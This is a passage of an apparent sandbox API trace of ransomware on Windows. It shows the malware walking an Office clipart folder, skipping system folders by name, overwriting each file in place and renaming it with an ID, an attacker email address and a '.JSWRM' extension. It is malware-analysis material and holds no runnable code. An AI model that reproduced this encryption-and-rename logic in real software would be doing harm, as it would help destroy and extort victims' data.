(HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0078.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0078.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0078.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0078.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0078.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.988] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00623_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00623_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0078.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0078.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0078.989] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x844, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00625_.WMF", cAlternateFileName="")) returned 1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2=".") returned 1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="..") returned 1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="...") returned 1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="windows") returned -1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="recovery") returned -1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="perflogs") returned -1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="documents and settings") returned 1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="system volume information") returned -1 [0078.989] lstrcmpiW (lpString1="HH00625_.WMF", lpString2="msocache") returned -1 [0078.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0078.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00625_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00625_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00625_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0078.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0078.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00625_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00625_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00625_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0078.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0078.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0078.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0078.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00625_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.990] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2116) returned 1 [0078.990] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x840) returned 0x20c6c0 [0078.990] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x840, lpOverlapped=0x0) returned 1 [0078.992] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.992] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x840, lpOverlapped=0x0) returned 1 [0078.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0078.992] CloseHandle (hObject=0x314) returned 1 [0078.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0078.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0078.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0078.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0078.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0078.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0078.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.993] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00625_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00625_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0078.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0078.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0078.993] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x620, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00636_.WMF", cAlternateFileName="")) returned 1 [0078.993] lstrcmpiW (lpString1="HH00636_.WMF", lpString2=".") returned 1 [0078.993] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="..") returned 1 [0078.994] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="...") returned 1 [0078.994] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="windows") returned -1 [0078.994] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="recovery") returned -1 [0078.994] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="perflogs") returned -1 [0078.994] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="documents and settings") returned 1 [0078.994] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.994] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="system volume information") returned -1 [0078.994] lstrcmpiW (lpString1="HH00636_.WMF", lpString2="msocache") returned -1 [0078.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0078.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00636_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00636_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00636_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0078.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0078.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00636_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00636_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00636_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0078.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0078.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0078.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0078.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.994] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1568) returned 1 [0078.994] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x620) returned 0x2332c0 [0078.995] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x620, lpOverlapped=0x0) returned 1 [0079.012] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.012] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x620, lpOverlapped=0x0) returned 1 [0079.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0079.012] CloseHandle (hObject=0x314) returned 1 [0079.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0079.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0079.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0079.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0079.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0079.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00636_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00636_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0079.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.013] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ce2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00669_.WMF", cAlternateFileName="")) returned 1 [0079.013] lstrcmpiW (lpString1="HH00669_.WMF", lpString2=".") returned 1 [0079.013] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="..") returned 1 [0079.013] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="...") returned 1 [0079.013] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="windows") returned -1 [0079.013] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="recovery") returned -1 [0079.014] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="perflogs") returned -1 [0079.014] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="documents and settings") returned 1 [0079.014] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.014] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="system volume information") returned -1 [0079.014] lstrcmpiW (lpString1="HH00669_.WMF", lpString2="msocache") returned -1 [0079.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00669_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00669_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00669_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00669_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00669_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00669_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00669_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.015] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11490) returned 1 [0079.015] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ce0) returned 0x24d210 [0079.015] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2ce0, lpOverlapped=0x0) returned 1 [0079.017] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.017] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2ce0, lpOverlapped=0x0) returned 1 [0079.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.018] CloseHandle (hObject=0x314) returned 1 [0079.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0079.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0079.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0079.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0079.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0079.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.018] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00669_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00669_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0079.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.019] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, 